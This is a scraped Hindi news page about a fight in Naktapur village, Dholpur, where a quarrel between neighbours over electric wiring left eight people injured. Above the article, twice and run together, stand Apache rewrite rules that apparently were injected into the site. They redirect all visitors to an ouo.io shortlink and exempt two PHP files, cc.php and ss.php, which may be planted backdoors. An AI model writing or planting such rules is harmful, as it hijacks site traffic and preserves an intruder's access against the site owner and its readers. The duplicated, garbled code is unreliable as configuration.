
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 291
Previous Nextधौलपुर। धौलपुर जिला मुख्यालय के सदर थाना क्षेत्र के नकटपुर गांव में आज विद्युत लाइन के तार डालने को लेकर दो पक्षों में शुरू हुए मामूली विवाद ने खूनी संघर्ष का रूप ले लिया। दोनों पक्षों की ओर से लाठियां चली एवं जमकर पथराव हुआ। इसमें दोनों गुटों के आठ लोग गंभीर रूप से घायल हो गए। झगड़े की जानकारी मिलने के बाद मौके पर पहुंची पुलिस ने सभी घायलों को जिला अस्पताल के ट्रोमा सेंटर में भर्ती कराया। उपचाररत एक-दो लोगों की हालत गंभीर बताई जा रही है।
जानकारी के अनुसार नकटपुरा गांव में नारायण सिंह नाम का व्यक्ति अपने घर में बिजली कनेक्शन के लिए तार खींचवा रहा था. उसकी पड़ोस मे रहने वाले रामखिलाड़ी को इसे लेकर कुछ आपत्ति थी। इसके बाद दोनों में कहासूनी हो गई। इस दौरान दोनों के परिवार वाले भी बाहर आ गए और बात बढ़ने लगी। आस-पास के लोगों ने दोनों पक्षों से समझाइश की कोशिक की लेकिन, वे नहीं माने। इसके बाद एक पक्ष ने लाठियों से हमला कर दिया। वहीं दूसरी ओर से पत्थर बरसाए गए।
स्थानीय लोगों की सूचना पर मौके पर पहुंची पुलिस ने दोनों पक्षों को शांत कराया और घायलों को अस्पताल में भर्ती कराया। हालांकि, मामले में अब तक किसी भी पक्ष की ओर से थाने में रिपोर्ट दर्ज नहीं कराई गई है।